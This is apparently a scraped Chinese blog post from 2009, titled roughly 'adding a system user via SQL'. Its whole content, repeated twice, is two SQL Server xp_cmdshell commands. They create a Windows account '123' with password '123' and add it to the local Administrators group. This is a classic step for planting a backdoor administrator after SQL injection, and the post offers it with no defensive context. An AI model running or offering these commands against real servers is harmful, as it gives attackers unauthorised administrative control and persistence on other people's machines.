exec xp_cmdshell 'net user 123 123 /add'
exec xp_cmdshell 'net localgroup Administrators 123 /add'
Wednesday, April 1, 2009
通过SQL增加系统用户
Posted by 逐风浪子 at 00:12 0 comments
Subscribe to:
Posts (Atom)
exec xp_cmdshell 'net user 123 123 /add'
exec xp_cmdshell 'net localgroup Administrators 123 /add'
Posted by 逐风浪子 at 00:12 0 comments